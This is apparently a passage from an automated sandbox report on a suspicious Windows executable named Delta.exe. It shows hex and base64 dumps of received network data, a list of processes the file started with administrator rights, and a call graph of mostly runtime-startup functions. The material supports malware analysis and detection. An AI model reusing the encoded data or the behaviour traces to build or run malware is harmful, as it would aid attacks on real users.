                                                                                        2024-12-31 16:21:25 UTC1369INData Raw: 74 74 58 4a 64 74 66 46 63 4b 54 78 41 52 4c 30 46 63 42 63 47 43 32 6f 6b 45 74 69 49 74 5a 54 67 48 4e 34 37 66 6a 53 6e 2f 51 38 69 6b 73 36 77 70 58 79 62 6a 6f 44 6e 33 52 53 68 30 65 55 72 7a 68 4a 54 2f 61 6c 43 74 47 55 64 6a 7a 73 4d 63 49 63 72 44 39 52 53 6e 74 56 67 76 6a 6e 39 4a 56 61 2b 6c 59 58 44 31 50 6c 73 49 68 4f 4b 6d 48 43 55 73 4c 33 4e 6a 33 77 30 45 6d 36 75 73 30 4a 2f 30 37 54 4d 6d 58 38 46 78 39 39 58 38 45 42 58 47 58 77 31 6f 76 6d 37 78 56 44 6e 37 48 68 4b 2f 46 53 79 76 6c 32 6b 4a 39 79 43 6f 78 79 72 44 4c 43 6d 50 66 52 45 4a 78 66 49 2f 61 44 42 62 48 6a 78 46 7a 66 38 44 78 67 38 38 68 47 36 6a 55 61 48 48 4f 4f 30 79 6b 7a 66 68 5a 64 4e 31 31 55 43 70 39 69 38 42 64 54 4c 71 6c 44 6e 5a 45 34 76 47 37 6f 45 45 66
                                                                                        Data Ascii: ttXJdtfFcKTxARL0FcBcGC2okEtiItZTgHN47fjSn/Q8iks6wpXybjoDn3RSh0eUrzhJT/alCtGUdjzsMcIcrD9RSntVgvjn9JVa+lYXD1PlsIhOKmHCUsL3Nj3w0Em6us0J/07TMmX8Fx99X8EBXGXw1ovm7xVDn7HhK/FSyvl2kJ9yCoxyrDLCmPfREJxfI/aDBbHjxFzf8Dxg88hG6jUaHHOO0ykzfhZdN11UCp9i8BdTLqlDnZE4vG7oEEf
                                                                                        2024-12-31 16:21:25 UTC1369INData Raw: 2f 4f 41 42 62 64 6b 5a 67 4d 66 74 70 42 64 78 68 54 76 50 59 70 55 72 2b 49 41 6b 42 57 2b 63 36 75 2f 30 70 73 2f 76 67 31 45 76 77 6f 43 76 61 36 30 51 46 76 36 30 70 73 4b 45 66 4f 30 56 38 66 68 4a 41 70 62 48 7a 63 2f 35 75 39 4c 68 48 41 33 30 6b 75 2b 54 31 51 77 4c 2f 57 4b 55 2b 56 58 68 30 6b 59 4b 37 4b 4b 52 72 59 76 46 46 56 61 66 62 44 2b 50 30 77 49 50 37 6e 52 53 4c 43 4d 7a 2b 2f 6b 4f 67 47 56 64 39 2f 41 32 4a 6f 6c 66 4d 34 47 49 75 51 45 31 39 64 6d 4f 33 77 78 42 39 7a 38 2b 6f 77 4f 37 41 4a 57 76 4b 4f 7a 46 70 6f 78 6a 74 66 47 54 4f 53 2b 69 30 67 74 66 59 79 52 6c 62 4c 34 4c 76 75 44 48 44 77 6d 47 31 38 36 69 6f 4b 38 5a 62 39 51 6c 66 66 63 6b 41 64 62 71 6e 38 41 77 75 2f 71 41 35 6e 41 75 2f 48 68 66 30 4d 48 62 53 5a 4d
                                                                                        Data Ascii: /OABbdkZgMftpBdxhTvPYpUr+IAkBW+c6u/0ps/vg1EvwoCva60QFv60psKEfO0V8fhJApbHzc/5u9LhHA30ku+T1QwL/WKU+VXh0kYK7KKRrYvFFVafbD+P0wIP7nRSLCMz+/kOgGVd9/A2JolfM4GIuQE19dmO3wxB9z8+owO7AJWvKOzFpoxjtfGTOS+i0gtfYyRlbL4LvuDHDwmG186ioK8Zb9QlffckAdbqn8Awu/qA5nAu/Hhf0MHbSZM
                                                                                        2024-12-31 16:21:25 UTC1369INData Raw: 7a 36 6f 76 72 48 7a 54 54 66 51 46 2b 63 36 6e 42 47 45 47 45 72 77 64 32 42 74 6a 68 74 50 41 52 45 4f 36 64 5a 44 37 52 49 46 43 6e 6e 4e 55 72 58 65 52 7a 64 53 35 6e 70 37 38 6c 45 6f 47 72 4d 6b 52 52 32 4d 47 44 30 44 6f 75 79 75 6c 77 63 63 55 4b 57 36 4c 4f 69 69 74 6c 38 6e 52 44 63 45 79 5a 39 68 77 51 70 4b 64 5a 59 55 50 62 33 37 75 75 54 78 54 6d 6c 30 77 34 2f 45 77 61 34 71 48 4e 4f 55 33 4a 4a 57 70 6d 4d 4c 58 33 58 51 33 62 75 46 56 6b 56 63 72 75 39 2f 52 49 49 4f 76 4b 56 53 50 6b 46 79 7a 46 6e 38 6b 35 4e 65 6c 44 63 52 4e 55 67 71 45 79 46 59 2f 74 4c 32 4a 33 31 6f 36 47 7a 41 41 41 73 2f 70 69 4a 4f 49 43 45 65 43 4e 30 44 39 44 38 6e 77 41 42 56 6a 55 2f 77 6b 6c 77 35 49 4b 53 45 58 39 31 71 50 67 43 69 7a 6d 34 6a 55 45 30 7a
                                                                                        Data Ascii: z6ovrHzTTfQF+c6nBGEGErwd2BtjhtPAREO6dZD7RIFCnnNUrXeRzdS5np78lEoGrMkRR2MGD0DouyulwccUKW6LOiitl8nRDcEyZ9hwQpKdZYUPb37uuTxTml0w4/Ewa4qHNOU3JJWpmMLX3XQ3buFVkVcru9/RIIOvKVSPkFyzFn8k5NelDcRNUgqEyFY/tL2J31o6GzAAAs/piJOICEeCN0D9D8nwABVjU/wklw5IKSEX91qPgCizm4jUE0z
                                                                                        2024-12-31 16:21:25 UTC1369INData Raw: 77 68 31 76 39 46 35 6b 4a 58 79 35 35 67 39 53 6d 5a 38 31 59 58 72 73 39 59 62 58 44 79 79 79 32 54 35 2f 32 53 6b 4c 34 49 48 51 47 6e 48 50 56 45 4e 36 64 35 2f 36 4f 45 79 34 68 51 6c 41 5a 39 33 31 6f 72 30 34 50 73 6e 6d 5a 58 72 67 45 51 37 4d 31 50 49 4d 4d 49 64 31 52 6e 74 6f 69 61 63 35 44 34 4b 58 4a 47 78 46 6e 70 79 47 2b 7a 63 50 72 4d 5a 75 44 38 73 79 4c 38 43 4e 79 43 78 54 39 43 56 4d 4b 33 65 6f 38 56 4d 7a 6e 4c 73 6f 5a 6d 48 62 77 4b 4b 6e 4b 79 58 4f 6d 47 6f 62 7a 51 34 36 79 62 72 6c 4a 47 72 6f 53 55 5a 36 51 38 72 6f 50 54 36 30 6e 41 35 74 59 39 54 48 69 2b 52 4a 4b 75 71 5a 4d 54 6e 41 41 6a 58 6a 69 2f 31 43 64 65 68 48 58 77 52 58 6a 66 67 34 48 4c 2b 77 43 41 35 76 67 64 53 79 70 44 73 75 73 65 41 77 4c 63 59 42 4a 4d 69
                                                                                        Data Ascii: wh1v9F5kJXy55g9SmZ81YXrs9YbXDyyy2T5/2SkL4IHQGnHPVEN6d5/6OEy4hQlAZ931or04PsnmZXrgEQ7M1PIMMId1Rntoiac5D4KXJGxFnpyG+zcPrMZuD8syL8CNyCxT9CVMK3eo8VMznLsoZmHbwKKnKyXOmGobzQ46ybrlJGroSUZ6Q8roPT60nA5tY9THi+RJKuqZMTnAAjXji/1CdehHXwRXjfg4HL+wCA5vgdSypDsuseAwLcYBJMi
                                                                                        2024-12-31 16:21:25 UTC1369INData Raw: 59 74 43 56 54 70 33 74 2b 4e 65 45 72 79 36 4d 47 39 63 6d 39 4b 48 7a 68 34 66 35 74 6c 4a 4c 65 4d 50 41 65 4f 38 36 78 78 7a 30 33 30 42 66 6e 33 4f 39 51 59 50 6d 2b 34 4e 51 57 44 55 7a 72 54 68 43 42 61 77 2f 45 63 62 34 77 34 51 78 71 76 4a 44 6b 37 2f 4b 41 51 47 55 4e 44 6f 4d 78 53 63 73 41 42 79 52 64 76 6d 72 61 41 71 47 36 6a 71 59 78 33 78 4b 79 7a 62 7a 50 4a 59 51 4d 68 56 64 48 39 4c 6f 74 49 38 41 36 72 74 42 6d 46 66 39 34 4f 4c 6f 54 73 49 35 73 42 4d 4a 38 64 4d 57 36 4b 6a 31 52 38 38 32 43 56 75 50 6e 66 51 70 78 6b 7a 68 35 45 6b 64 48 47 61 67 71 62 51 4c 69 54 66 2b 6c 63 48 35 43 52 62 39 35 4c 62 44 31 62 51 49 56 35 78 64 34 6a 33 4b 78 62 55 74 78 46 71 52 2f 71 4f 74 4d 55 38 44 76 44 38 51 41 66 37 4c 43 72 6a 71 4d 6f 44
                                                                                        Data Ascii: YtCVTp3t+NeEry6MG9cm9KHzh4f5tlJLeMPAeO86xxz030Bfn3O9QYPm+4NQWDUzrThCBaw/Ecb4w4QxqvJDk7/KAQGUNDoMxScsAByRdvmraAqG6jqYx3xKyzbzPJYQMhVdH9LotI8A6rtBmFf94OLoTsI5sBMJ8dMW6Kj1R882CVuPnfQpxkzh5EkdHGagqbQLiTf+lcH5CRb95LbD1bQIV5xd4j3KxbUtxFqR/qOtMU8DvD8QAf7LCrjqMoD


                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to dive into process behavior distribution

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:11:21:12
                                                                                        Start date:31/12/2024
                                                                                        Path:C:\Users\user\Desktop\Delta.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\Delta.exe"
                                                                                        Imagebase:0x5e0000
                                                                                        File size:813'568 bytes
                                                                                        MD5 hash:24A858EBB9FC24D58BB3615386CE0F43
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:1
                                                                                        Start time:11:21:12
                                                                                        Start date:31/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:11:21:13
                                                                                        Start date:31/12/2024
                                                                                        Path:C:\Users\user\Desktop\Delta.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\Delta.exe"
                                                                                        Imagebase:0x5e0000
                                                                                        File size:813'568 bytes
                                                                                        MD5 hash:24A858EBB9FC24D58BB3615386CE0F43
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:false

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:8.1%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:1.1%
                                                                                          Total number of Nodes:2000
                                                                                          Total number of Limit Nodes:32
                                                                                          execution_graph 16670 5ea152 16671 5ea15e ___scrt_is_nonwritable_in_current_image 16670->16671 16696 5e73ba 16671->16696 16673 5ea165 16674 5ea2be 16673->16674 16684 5ea18f ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 16673->16684 16736 5e9a73 IsProcessorFeaturePresent 16674->16736 16676 5ea2c5 16716 5ef179 16676->16716 16681 5ea1ae 16682 5ea22f 16707 5f16ec 16682->16707 16684->16681 16684->16682 16719 5ef1c3 16684->16719 16686 5ea235 16711 5e20c0 GetModuleHandleA GetProcAddress FreeConsole 16686->16711 16691 5ea25a 16692 5ea263 16691->16692 16727 5ef1a5 16691->16727 16730 5e73f3 16692->16730 16697 5e73c3 16696->16697 16743 5e96db IsProcessorFeaturePresent 16697->16743 16701 5e73d4 16702 5e73d8 16701->16702 16753 5ed0a0 16701->16753 16702->16673 16705 5e73ef 16705->16673 16708 5f16fa 16707->16708 16709 5f16f5 16707->16709 16708->16686 16825 5f1815 16709->16825 17756 5e20b0 16711->17756 16714 5e71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 16715 5e2126 16714->16715 16725 5e9a20 GetModuleHandleW 16715->16725 18167 5ef2c4 16716->18167 16720 5ef1d9 ___scrt_is_nonwritable_in_current_image std::_Lockit::_Lockit 16719->16720 16720->16682 16721 5f594a __Getctype 48 API calls 16720->16721 16724 5f38fc 16721->16724 16722 5f1f83 CallUnexpected 48 API calls 16723 5f3926 16722->16723 16724->16722 16726 5e9a2c 16725->16726 16726->16676 16726->16691 16728 5ef2c4 __CreateFrameInfo 21 API calls 16727->16728 16729 5ef1b0 16728->16729 16729->16692 16731 5e73ff 16730->16731 16732 5e7415 16731->16732 18240 5ed0b2 16731->18240 16732->16681 16734 5e740d 16735 5eab4e ___scrt_uninitialize_crt 7 API calls 16734->16735 16735->16732 16737 5e9a89 __CreateFrameInfo std::bad_exception::bad_exception 16736->16737 16738 5e9b34 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16737->16738 16739 5e9b78 __CreateFrameInfo 16738->16739 16739->16676 16740 5ef18f 16741 5ef2c4 __CreateFrameInfo 21 API calls 16740->16741 16742 5ea2d3 16741->16742 16744 5e73cf 16743->16744 16745 5eab2f 16744->16745 16762 5f5386 16745->16762 16748 5eab38 16748->16701 16750 5eab40 16751 5eab4b 16750->16751 16776 5f53c2 16750->16776 16751->16701 16816 5f7a29 16753->16816 16756 5eab4e 16757 5eab57 16756->16757 16758 5eab61 16756->16758 16759 5f4444 ___vcrt_uninitialize_ptd 6 API calls 16757->16759 16758->16702 16760 5eab5c 16759->16760 16761 5f53c2 ___vcrt_uninitialize_locks DeleteCriticalSection 16760->16761 16761->16758 16763 5f538f 16762->16763 16765 5f53b8 16763->16765 16766 5eab34 16763->16766 16780 5ff669 16763->16780 16767 5f53c2 ___vcrt_uninitialize_locks DeleteCriticalSection 16765->16767 16766->16748 16768 5f4411 16766->16768 16767->16766 16797 5ff57a 16768->16797 16773 5f4441 16773->16750 16775 5f4426 16775->16750 16777 5f53ec 16776->16777 16778 5f53cd 16776->16778 16777->16748 16779 5f53d7 DeleteCriticalSection 16778->16779 16779->16777 16779->16779 16785 5ff6fb 16780->16785 16783 5ff68c 16783->16763 16784 5ff6a1 InitializeCriticalSectionAndSpinCount 16784->16783 16786 5ff71c 16785->16786 16787 5ff683 16785->16787 16786->16787 16788 5ff784 GetProcAddress 16786->16788 16790 5ff775 16786->16790 16792 5ff6b0 LoadLibraryExW 16786->16792 16787->16783 16787->16784 16788->16787 16790->16788 16791 5ff77d FreeLibrary 16790->16791 16791->16788 16793 5ff6f7 16792->16793 16794 5ff6c7 GetLastError 16792->16794 16793->16786 16794->16793 16795 5ff6d2 ___vcrt_InitializeCriticalSectionEx 16794->16795 16795->16793 16796 5ff6e8 LoadLibraryExW 16795->16796 16796->16786 16798 5ff6fb ___vcrt_InitializeCriticalSectionEx 5 API calls 16797->16798 16799 5ff594 16798->16799 16800 5ff5ad TlsAlloc 16799->16800 16801 5f441b 16799->16801 16801->16775 16802 5ff62b 16801->16802 16803 5ff6fb ___vcrt_InitializeCriticalSectionEx 5 API calls 16802->16803 16804 5ff645 16803->16804 16805 5ff660 TlsSetValue 16804->16805 16806 5f4434 16804->16806 16805->16806 16806->16773 16807 5f4444 16806->16807 16808 5f444e 16807->16808 16809 5f4454 16807->16809 16811 5ff5b5 16808->16811 16809->16775 16812 5ff6fb ___vcrt_InitializeCriticalSectionEx 5 API calls 16811->16812 16813 5ff5cf 16812->16813 16814 5ff5e7 TlsFree 16813->16814 16815 5ff5db 16813->16815 16814->16815 16815->16809 16817 5f7a39 16816->16817 16818 5e73e1 16816->16818 16817->16818 16820 5f7192 16817->16820 16818->16705 16818->16756 16824 5f7199 16820->16824 16821 5f71dc GetStdHandle 16821->16824 16822 5f723e 16822->16817 16823 5f71ef GetFileType 16823->16824 16824->16821 16824->16822 16824->16823 16826 5f1834 16825->16826 16827 5f181e 16825->16827 16826->16708 16827->16826 16831 5f1756 16827->16831 16829 5f182b 16829->16826 16848 5f1923 16829->16848 16832 5f175f 16831->16832 16833 5f1762 16831->16833 16832->16829 16857 5f7260 16833->16857 16838 5f177f 16890 5f1841 16838->16890 16839 5f1773 16884 5f56b7 16839->16884 16844 5f56b7 ___free_lconv_mon 14 API calls 16845 5f17a3 16844->16845 16846 5f56b7 ___free_lconv_mon 14 API calls 16845->16846 16847 5f17a9 16846->16847 16847->16829 16849 5f1994 16848->16849 16850 5f1932 16848->16850 16849->16826 16850->16849 16851 5f69f4 __Getctype 14 API calls 16850->16851 16852 5f1998 16850->16852 16854 5f5801 WideCharToMultiByte _Fputc 16850->16854 16856 5f56b7 ___free_lconv_mon 14 API calls 16850->16856 17475 5fca45 16850->17475 16851->16850 16853 5f56b7 ___free_lconv_mon 14 API calls 16852->16853 16853->16849 16854->16850 16856->16850 16858 5f7269 16857->16858 16862 5f1768 16857->16862 16912 5f5a05 16858->16912 16863 5fc96e GetEnvironmentStringsW 16862->16863 16864 5fc986 16863->16864 16879 5f176d 16863->16879 16865 5f5801 _Fputc WideCharToMultiByte 16864->16865 16866 5fc9a3 16865->16866 16867 5fc9ad FreeEnvironmentStringsW 16866->16867 16868 5fc9b8 16866->16868 16867->16879 16869 5f56f1 __strnicoll 15 API calls 16868->16869 16870 5fc9bf 16869->16870 16871 5fc9d8 16870->16871 16872 5fc9c7 16870->16872 16873 5f5801 _Fputc WideCharToMultiByte 16871->16873 16874 5f56b7 ___free_lconv_mon 14 API calls 16872->16874 16875 5fc9e8 16873->16875 16876 5fc9cc FreeEnvironmentStringsW 16874->16876 16877 5fc9ef 16875->16877 16878 5fc9f7 16875->16878 16876->16879 16880 5f56b7 ___free_lconv_mon 14 API calls 16877->16880 16881 5f56b7 ___free_lconv_mon 14 API calls 16878->16881 16879->16838 16879->16839 16882 5fc9f5 FreeEnvironmentStringsW 16880->16882 16881->16882 16882->16879 16885 5f1779 16884->16885 16886 5f56c2 RtlFreeHeap 16884->16886 16885->16829 16886->16885 16887 5f56d7 GetLastError 16886->16887 16888 5f56e4 __dosmaperr 16887->16888 16889 5f1314 __Wcrtomb 12 API calls 16888->16889 16889->16885 16891 5f1856 16890->16891 16892 5f69f4 __Getctype 14 API calls 16891->16892 16893 5f187d 16892->16893 16894 5f188f 16893->16894 16895 5f1885 16893->16895 16898 5f18ec 16894->16898 16900 5f69f4 __Getctype 14 API calls 16894->16900 16901 5f18fb 16894->16901 16906 5f1916 16894->16906 16908 5f56b7 ___free_lconv_mon 14 API calls 16894->16908 17456 5f532c 16894->17456 16896 5f56b7 ___free_lconv_mon 14 API calls 16895->16896 16897 5f1786 16896->16897 16897->16844 16899 5f56b7 ___free_lconv_mon 14 API calls 16898->16899 16899->16897 16900->16894 17465 5f17e6 16901->17465 16905 5f56b7 ___free_lconv_mon 14 API calls 16907 5f1908 16905->16907 17471 5f1a2c IsProcessorFeaturePresent 16906->17471 16910 5f56b7 ___free_lconv_mon 14 API calls 16907->16910 16908->16894 16910->16897 16911 5f1922 16913 5f5a10 16912->16913 16917 5f5a16 16912->16917 16962 5f6374 16913->16962 16918 5f5a1c 16917->16918 16967 5f63b3 16917->16967 16921 5f5a21 16918->16921 16984 5f1f83 16918->16984 16919 5f5a34 16972 5f69f4 16919->16972 16940 5f7621 16921->16940 16925 5f5a5d 16927 5f63b3 __Getctype 6 API calls 16925->16927 16926 5f5a48 16928 5f63b3 __Getctype 6 API calls 16926->16928 16929 5f5a69 16927->16929 16930 5f5a54 16928->16930 16931 5f5a6d 16929->16931 16932 5f5a7c 16929->16932 16933 5f56b7 ___free_lconv_mon 14 API calls 16930->16933 16934 5f63b3 __Getctype 6 API calls 16931->16934 16979 5f5c5c 16932->16979 16936 5f5a5a 16933->16936 16934->16930 16936->16918 16938 5f56b7 ___free_lconv_mon 14 API calls 16939 5f5a8e 16938->16939 16939->16921 16941 5f764b 16940->16941 17277 5f74ad 16941->17277 16946 5f767d 16948 5f56b7 ___free_lconv_mon 14 API calls 16946->16948 16947 5f768b 17291 5f72a8 16947->17291 16950 5f7664 16948->16950 16950->16862 16952 5f76c3 16953 5f1314 __Wcrtomb 14 API calls 16952->16953 16954 5f76c8 16953->16954 16958 5f56b7 ___free_lconv_mon 14 API calls 16954->16958 16955 5f770a 16957 5f7753 16955->16957 17302 5f79dc 16955->17302 16956 5f76de 16956->16955 16959 5f56b7 ___free_lconv_mon 14 API calls 16956->16959 16961 5f56b7 ___free_lconv_mon 14 API calls 16957->16961 16958->16950 16959->16955 16961->16950 16993 5f670d 16962->16993 16965 5f63ab TlsGetValue 16966 5f6399 16966->16917 16968 5f670d std::_Lockit::_Lockit 5 API calls 16967->16968 16969 5f63cf 16968->16969 16970 5f63ed TlsSetValue 16969->16970 16971 5f5a30 16969->16971 16971->16918 16971->16919 16977 5f6a01 __Getctype 16972->16977 16973 5f6a41 17011 5f1314 16973->17011 16974 5f6a2c HeapAlloc 16975 5f5a40 16974->16975 16974->16977 16975->16925 16975->16926 16977->16973 16977->16974 17008 5ef4ab 16977->17008 17048 5f5dc2 16979->17048 17150 5f7ae0 16984->17150 16986 5f1f9d IsProcessorFeaturePresent 16991 5f1f88 16986->16991 16988 5ef18f __CreateFrameInfo 21 API calls 16988->16991 16991->16984 16991->16986 16991->16988 16992 5f446c 16991->16992 17153 5f7b07 16991->17153 17180 5f1a60 16991->17180 17186 5f446d 16991->17186 16994 5f6390 16993->16994 16995 5f673d 16993->16995 16994->16965 16994->16966 16995->16994 17000 5f6642 16995->17000 16998 5f6757 GetProcAddress 16998->16994 16999 5f6767 std::_Lockit::_Lockit 16998->16999 16999->16994 17006 5f6653 ___vcrt_InitializeCriticalSectionEx 17000->17006 17001 5f66e9 17001->16994 17001->16998 17002 5f6671 LoadLibraryExW 17003 5f668c GetLastError 17002->17003 17004 5f66f0 17002->17004 17003->17006 17004->17001 17005 5f6702 FreeLibrary 17004->17005 17005->17001 17006->17001 17006->17002 17007 5f66bf LoadLibraryExW 17006->17007 17007->17004 17007->17006 17014 5ef4e6 17008->17014 17025 5f5a9b GetLastError 17011->17025 17013 5f1319 17013->16975 17015 5ef4f2 ___scrt_is_nonwritable_in_current_image 17014->17015 17020 5f1d11 EnterCriticalSection 17015->17020 17017 5ef4fd __CreateFrameInfo 17021 5ef534 17017->17021 17020->17017 17024 5f1d28 LeaveCriticalSection 17021->17024 17023 5ef4b6 17023->16977 17024->17023 17026 5f5ab7 17025->17026 17027 5f5ab1 17025->17027 17029 5f63b3 __Getctype 6 API calls 17026->17029 17031 5f5abb SetLastError 17026->17031 17028 5f6374 __Getctype 6 API calls 17027->17028 17028->17026 17030 5f5ad3 17029->17030 17030->17031 17033 5f69f4 __Getctype 12 API calls 17030->17033 17031->17013 17034 5f5ae8 17033->17034 17035 5f5b01 17034->17035 17036 5f5af0 17034->17036 17038 5f63b3 __Getctype 6 API calls 17035->17038 17037 5f63b3 __Getctype 6 API calls 17036->17037 17039 5f5afe 17037->17039 17040 5f5b0d 17038->17040 17044 5f56b7 ___free_lconv_mon 12 API calls 17039->17044 17041 5f5b28 17040->17041 17042 5f5b11 17040->17042 17045 5f5c5c __Getctype 12 API calls 17041->17045 17043 5f63b3 __Getctype 6 API calls 17042->17043 17043->17039 17044->17031 17046 5f5b33 17045->17046 17047 5f56b7 ___free_lconv_mon 12 API calls 17046->17047 17047->17031 17049 5f5dce ___scrt_is_nonwritable_in_current_image 17048->17049 17062 5f1d11 EnterCriticalSection 17049->17062 17051 5f5dd8 17063 5f5e08 17051->17063 17054 5f5e14 17055 5f5e20 ___scrt_is_nonwritable_in_current_image 17054->17055 17067 5f1d11 EnterCriticalSection 17055->17067 17057 5f5e2a 17068 5f5c11 17057->17068 17059 5f5e42 17072 5f5e62 17059->17072 17062->17051 17066 5f1d28 LeaveCriticalSection 17063->17066 17065 5f5cca 17065->17054 17066->17065 17067->17057 17069 5f5c20 __Getctype 17068->17069 17071 5f5c47 __Getctype 17068->17071 17069->17071 17075 5f9e8a 17069->17075 17071->17059 17149 5f1d28 LeaveCriticalSection 17072->17149 17074 5f5a87 17074->16938 17077 5f9f0a 17075->17077 17078 5f9ea0 17075->17078 17079 5f56b7 ___free_lconv_mon 14 API calls 17077->17079 17101 5f9f58 17077->17101 17078->17077 17081 5f9ed3 17078->17081 17085 5f56b7 ___free_lconv_mon 14 API calls 17078->17085 17080 5f9f2c 17079->17080 17083 5f56b7 ___free_lconv_mon 14 API calls 17080->17083 17082 5f9ef5 17081->17082 17090 5f56b7 ___free_lconv_mon 14 API calls 17081->17090 17084 5f56b7 ___free_lconv_mon 14 API calls 17082->17084 17086 5f9f3f 17083->17086 17087 5f9eff 17084->17087 17089 5f9ec8 17085->17089 17091 5f56b7 ___free_lconv_mon 14 API calls 17086->17091 17094 5f56b7 ___free_lconv_mon 14 API calls 17087->17094 17088 5f9fc6 17095 5f56b7 ___free_lconv_mon 14 API calls 17088->17095 17103 5f92e1 17089->17103 17092 5f9eea 17090->17092 17093 5f9f4d 17091->17093 17131 5f95fd 17092->17131 17098 5f56b7 ___free_lconv_mon 14 API calls 17093->17098 17094->17077 17099 5f9fcc 17095->17099 17098->17101 17099->17071 17100 5f9f66 17100->17088 17102 5f56b7 14 API calls ___free_lconv_mon 17100->17102 17143 5fa024 17101->17143 17102->17100 17104 5f92f2 17103->17104 17130 5f93db 17103->17130 17105 5f9303 17104->17105 17106 5f56b7 ___free_lconv_mon 14 API calls 17104->17106 17107 5f9315 17105->17107 17108 5f56b7 ___free_lconv_mon 14 API calls 17105->17108 17106->17105 17109 5f9327 17107->17109 17110 5f56b7 ___free_lconv_mon 14 API calls 17107->17110 17108->17107 17111 5f9339 17109->17111 17112 5f56b7 ___free_lconv_mon 14 API calls 17109->17112 17110->17109 17113 5f934b 17111->17113 17114 5f56b7 ___free_lconv_mon 14 API calls 17111->17114 17112->17111 17115 5f935d 17113->17115 17116 5f56b7 ___free_lconv_mon 14 API calls 17113->17116 17114->17113 17117 5f936f 17115->17117 17118 5f56b7 ___free_lconv_mon 14 API calls 17115->17118 17116->17115 17119 5f9381 17117->17119 17120 5f56b7 ___free_lconv_mon 14 API calls 17117->17120 17118->17117 17121 5f9393 17119->17121 17122 5f56b7 ___free_lconv_mon 14 API calls 17119->17122 17120->17119 17123 5f56b7 ___free_lconv_mon 14 API calls 17121->17123 17126 5f93a5 17121->17126 17122->17121 17123->17126 17130->17081 17132 5f960a 17131->17132 17133 5f9662 17131->17133 17134 5f961a 17132->17134 17135 5f56b7 ___free_lconv_mon 14 API calls 17132->17135 17133->17082 17136 5f962c 17134->17136 17137 5f56b7 ___free_lconv_mon 14 API calls 17134->17137 17135->17134 17138 5f963e 17136->17138 17139 5f56b7 ___free_lconv_mon 14 API calls 17136->17139 17137->17136 17140 5f9650 17138->17140 17141 5f56b7 ___free_lconv_mon 14 API calls 17138->17141 17139->17138 17140->17133 17142 5f56b7 ___free_lconv_mon 14 API calls 17140->17142 17141->17140 17142->17133 17144 5fa050 17143->17144 17145 5fa031 17143->17145 17144->17100 17145->17144 17146 5f96eb __Getctype 14 API calls 17145->17146 17147 5fa04a 17146->17147 17148 5f56b7 ___free_lconv_mon 14 API calls 17147->17148 17148->17144 17149->17074 17200 5f7d63 17150->17200 17154 5f7b13 ___scrt_is_nonwritable_in_current_image 17153->17154 17155 5f5a9b __dosmaperr 14 API calls 17154->17155 17156 5f7b63 17154->17156 17157 5f7b75 __CreateFrameInfo 17154->17157 17163 5f7b44 __CreateFrameInfo 17154->17163 17155->17163 17158 5f1314 __Wcrtomb 14 API calls 17156->17158 17160 5f7bab __CreateFrameInfo 17157->17160 17214 5f1d11 EnterCriticalSection 17157->17214 17159 5f7b68 17158->17159 17211 5f19ff 17159->17211 17165 5f7be8 17160->17165 17166 5f7ce5 17160->17166 17176 5f7c16 17160->17176 17163->17156 17163->17157 17179 5f7b4d 17163->17179 17165->17176 17215 5f594a GetLastError 17165->17215 17168 5f7cf0 17166->17168 17246 5f1d28 LeaveCriticalSection 17166->17246 17170 5ef18f __CreateFrameInfo 21 API calls 17168->17170 17171 5f7cf8 17170->17171 17173 5f594a __Getctype 48 API calls 17177 5f7c6b 17173->17177 17175 5f594a __Getctype 48 API calls 17175->17176 17242 5f7c91 17176->17242 17178 5f594a __Getctype 48 API calls 17177->17178 17177->17179 17178->17179 17179->16991 17181 5f1a7c __CreateFrameInfo std::bad_exception::bad_exception 17180->17181 17182 5f1aa8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17181->17182 17184 5f1b79 __CreateFrameInfo 17182->17184 17261 5e71d1 17184->17261 17185 5f1b97 17185->16991 17187 5f4479 GetLastError 17186->17187 17188 5f4476 17186->17188 17269 5ff5f0 17187->17269 17188->16991 17191 5f44f3 SetLastError 17191->16991 17192 5ff62b ___vcrt_FlsSetValue 6 API calls 17193 5f44a7 __Getctype 17192->17193 17194 5f44cf 17193->17194 17195 5ff62b ___vcrt_FlsSetValue 6 API calls 17193->17195 17199 5f44ad 17193->17199 17196 5ff62b ___vcrt_FlsSetValue 6 API calls 17194->17196 17197 5f44e3 17194->17197 17195->17194 17196->17197 17274 5f2a5e 17197->17274 17199->17191 17201 5f7d6f ___scrt_is_nonwritable_in_current_image 17200->17201 17206 5f1d11 EnterCriticalSection 17201->17206 17203 5f7d7d 17207 5f7dbf 17203->17207 17206->17203 17210 5f1d28 LeaveCriticalSection 17207->17210 17209 5f7b05 17209->16991 17210->17209 17247 5f1c4e 17211->17247 17213 5f1a0b 17213->17179 17214->17160 17216 5f5966 17215->17216 17217 5f5960 17215->17217 17218 5f63b3 __Getctype 6 API calls 17216->17218 17239 5f596a SetLastError 17216->17239 17219 5f6374 __Getctype 6 API calls 17217->17219 17220 5f5982 17218->17220 17219->17216 17222 5f69f4 __Getctype 14 API calls 17220->17222 17220->17239 17223 5f5997 17222->17223 17226 5f599f 17223->17226 17227 5f59b0 17223->17227 17224 5f59ff 17228 5f1f83 CallUnexpected 46 API calls 17224->17228 17225 5f59fa 